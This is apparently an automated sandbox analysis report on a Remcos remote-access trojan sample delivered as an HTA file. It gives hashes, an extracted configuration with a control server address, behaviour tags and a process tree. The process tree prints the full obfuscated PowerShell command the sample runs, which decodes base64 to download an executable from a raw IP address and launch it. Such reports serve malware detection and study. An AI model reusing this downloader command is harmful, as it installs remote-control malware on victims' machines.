remcos | 6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-12-2024 16:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

crreatedbestthingswithgreatattitudeneedforthat.hta
Size

142KB
MD5

22ca9f87ffb6d9d3dc9d7e4f151470c7
SHA1

df9bcef5ab55d8a5342bb7747d7936f4fe20afe7
SHA256

6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470
SHA512

e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2
SSDEEP

768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn

Score

10^/10

remcos elvis defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

elvis

107.173.4.16:2560

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-GJDISH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	4576	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2936	cmd.exe
4576	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
4928	nicetomeetyousweeet.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
2280	4928	WerFault.exe	87
4064	4928	WerFault.exe	87
3852	4928	WerFault.exe	87
4244	4928	WerFault.exe	87
1700	4928	WerFault.exe	87
868	4928	WerFault.exe	87
2832	4928	WerFault.exe	87
2136	4928	WerFault.exe	87
1212	4928	WerFault.exe	87
2116	4928	WerFault.exe	87
3512	4928	WerFault.exe	87
1488	4928	WerFault.exe	87
324	4928	WerFault.exe	87
4848	4928	WerFault.exe	87
3568	4928	WerFault.exe	87
4988	4928	WerFault.exe	87
1912	4928	WerFault.exe	87
3436	4928	WerFault.exe	87
1208	4928	WerFault.exe	87
5104	4928	WerFault.exe	87
860	4928	WerFault.exe	87
2216	4928	WerFault.exe	87
2876	4928	WerFault.exe	87
1376	4928	WerFault.exe	87
3112	4928	WerFault.exe	87
4692	4928	WerFault.exe	87
4608	4928	WerFault.exe	87
2120	4928	WerFault.exe	87
3420	4928	WerFault.exe	87
2628	4928	WerFault.exe	87
4880	4928	WerFault.exe	87
3848	4928	WerFault.exe	87
1384	4928	WerFault.exe	87
4172	4928	WerFault.exe	87
3660	4928	WerFault.exe	87
3640	4928	WerFault.exe	87
3152	4928	WerFault.exe	87
1644	4928	WerFault.exe	87
8	4928	WerFault.exe	87
4968	4928	WerFault.exe	87
5064	4928	WerFault.exe	87
1800	4928	WerFault.exe	87
2936	4928	WerFault.exe	87
2584	4928	WerFault.exe	87
1992	4928	WerFault.exe	87
3544	4928	WerFault.exe	87
3244	4928	WerFault.exe	87
3556	4928	WerFault.exe	87
4804	4928	WerFault.exe	87
1700	4928	WerFault.exe	87
1548	4928	WerFault.exe	87
2312	4928	WerFault.exe	87
3428	4928	WerFault.exe	87
2348	4928	WerFault.exe	87
2892	4928	WerFault.exe	87
4516	4928	WerFault.exe	87
2568	4928	WerFault.exe	87
2420	4928	WerFault.exe	87
4672	4928	WerFault.exe	87
1596	4928	WerFault.exe	87
2760	4928	WerFault.exe	87
3632	4928	WerFault.exe	87
688	4928	WerFault.exe	87
1112	4928	WerFault.exe	87

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nicetomeetyousweeet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4576	powershell.exe
4576	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1680 wrote to memory of 2936	1680	mshta.exe	82
PID 1680 wrote to memory of 2936	1680	mshta.exe	82
PID 1680 wrote to memory of 2936	1680	mshta.exe	82
PID 2936 wrote to memory of 4576	2936	cmd.exe	84
PID 2936 wrote to memory of 4576	2936	cmd.exe	84
PID 2936 wrote to memory of 4576	2936	cmd.exe	84
PID 4576 wrote to memory of 2464	4576	powershell.exe	85
PID 4576 wrote to memory of 2464	4576	powershell.exe	85
PID 4576 wrote to memory of 2464	4576	powershell.exe	85
PID 2464 wrote to memory of 1576	2464	csc.exe	86
PID 2464 wrote to memory of 1576	2464	csc.exe	86
PID 2464 wrote to memory of 1576	2464	csc.exe	86
PID 4576 wrote to memory of 4928	4576	powershell.exe	87
PID 4576 wrote to memory of 4928	4576	powershell.exe	87
PID 4576 wrote to memory of 4928	4576	powershell.exe	87

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1680
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hgrkcgog\hgrkcgog.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2464
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA93.tmp" "c:\Users\Admin\AppData\Local\Temp\hgrkcgog\CSCC92F1342238240C8AFE84F3EE2AAB363.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1576
  - - C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
      "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4928
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 648
        5⤵
        Program crash
        
        PID:2280
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 656
        5⤵
        Program crash
        
        PID:4064
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 660
        5⤵
        Program crash
        
        PID:3852
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 676
        5⤵
        Program crash
        
        PID:4244
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 636
        5⤵
        Program crash
        
        PID:1700
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 696
        5⤵
        Program crash
        
        PID:868
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 704
        5⤵
        Program crash
        
        PID:2832
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 652
        5⤵
        Program crash
        
        PID:2136
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 632
        5⤵
        Program crash
        
        PID:1212
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 728
        5⤵
        Program crash
        
        PID:2116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 632
        5⤵
        Program crash
        
        PID:3512
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 648
        5⤵
        Program crash
        
        PID:1488
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 712
        5⤵
        Program crash
        
        PID:324
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 652
        5⤵
        Program crash
        
        PID:4848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 736
        5⤵
        Program crash
        
        PID:3568
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 720
        5⤵
        Program crash
        
        PID:4988
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 796
        5⤵
        Program crash
        
        PID:1912
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 804
        5⤵
        Program crash
        
        PID:3436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 756
        5⤵
        Program crash
        
        PID:1208
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 816
        5⤵
        Program crash
        
        PID:5104
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 756
        5⤵
        Program crash
        
        PID:860
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 820
        5⤵
        Program crash
        
        PID:2216
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 732
        5⤵
        Program crash
        
        PID:2876
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 832
        5⤵
        Program crash
        
        PID:1376
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 720
        5⤵
        Program crash
        
        PID:3112
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 792
        5⤵
        Program crash
        
        PID:4692
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 720
        5⤵
        Program crash
        
        PID:4608
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 812
        5⤵
        Program crash
        
        PID:2120
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 872
        5⤵
        Program crash
        
        PID:3420
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 884
        5⤵
        Program crash
        
        PID:2628
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 856
        5⤵
        Program crash
        
        PID:4880
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 884
        5⤵
        Program crash
        
        PID:3848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 820
        5⤵
        Program crash
        
        PID:1384
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 760
        5⤵
        Program crash
        
        PID:4172
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 820
        5⤵
        Program crash
        
        PID:3660
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 876
        5⤵
        Program crash
        
        PID:3640
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 820
        5⤵
        Program crash
        
        PID:3152
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 840
        5⤵
        Program crash
        
        PID:1644
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 876
        5⤵
        Program crash
        
        PID:8
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 792
        5⤵
        Program crash
        
        PID:4968
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 796
        5⤵
        Program crash
        
        PID:5064
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 884
        5⤵
        Program crash
        
        PID:1800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 796
        5⤵
        Program crash
        
        PID:2936
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 844
        5⤵
        Program crash
        
        PID:2584
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 884
        5⤵
        Program crash
        
        PID:1992
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 916
        5⤵
        Program crash
        
        PID:3544
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 920
        5⤵
        Program crash
        
        PID:3244
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 928
        5⤵
        Program crash
        
        PID:3556
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 904
        5⤵
        Program crash
        
        PID:4804
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 928
        5⤵
        Program crash
        
        PID:1700
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 904
        5⤵
        Program crash
        
        PID:1548
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 944
        5⤵
        Program crash
        
        PID:2312
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 852
        5⤵
        Program crash
        
        PID:3428
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 912
        5⤵
        Program crash
        
        PID:2348
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 904
        5⤵
        Program crash
        
        PID:2892
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 852
        5⤵
        Program crash
        
        PID:4516
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 940
        5⤵
        Program crash
        
        PID:2568
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 852
        5⤵
        Program crash
        
        PID:2420
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 976
        5⤵
        Program crash
        
        PID:4672
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 852
        5⤵
        Program crash
        
        PID:1596
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 980
        5⤵
        Program crash
        
        PID:2760
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 852
        5⤵
        Program crash
        
        PID:3632
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1044
        5⤵
        Program crash
        
        PID:688
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1076
        5⤵
        Program crash
        
        PID:1112
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1052
        5⤵
        
        PID:5076
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1112
        5⤵
        
        PID:3620
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1124
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1112
        5⤵
        
        PID:4344
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1052
        5⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1048
        5⤵
        
        PID:2224
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1152
        5⤵
        
        PID:1436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1144
        5⤵
        
        PID:1972
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1136
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1164
        5⤵
        
        PID:2996
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1212
        5⤵
        
        PID:2504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4928 -ip 4928
1⤵
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4928 -ip 4928
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4928 -ip 4928
1⤵
PID:1972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4928 -ip 4928
1⤵
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4928 -ip 4928
1⤵
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4928 -ip 4928
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4928 -ip 4928
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4928 -ip 4928
1⤵
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4928 -ip 4928
1⤵
PID:3148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4928 -ip 4928
1⤵
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4928 -ip 4928
1⤵
PID:3996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4928 -ip 4928
1⤵
PID:440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4928 -ip 4928
1⤵
PID:1168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4928 -ip 4928
1⤵
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4928 -ip 4928
1⤵
PID:216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4928 -ip 4928
1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4928 -ip 4928
1⤵
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4928 -ip 4928
1⤵
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4928 -ip 4928
1⤵
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4928 -ip 4928
1⤵
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4928 -ip 4928
1⤵
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4928 -ip 4928
1⤵
PID:2668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4928 -ip 4928
1⤵
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4928 -ip 4928
1⤵
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4928 -ip 4928
1⤵
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4928 -ip 4928
1⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4928 -ip 4928
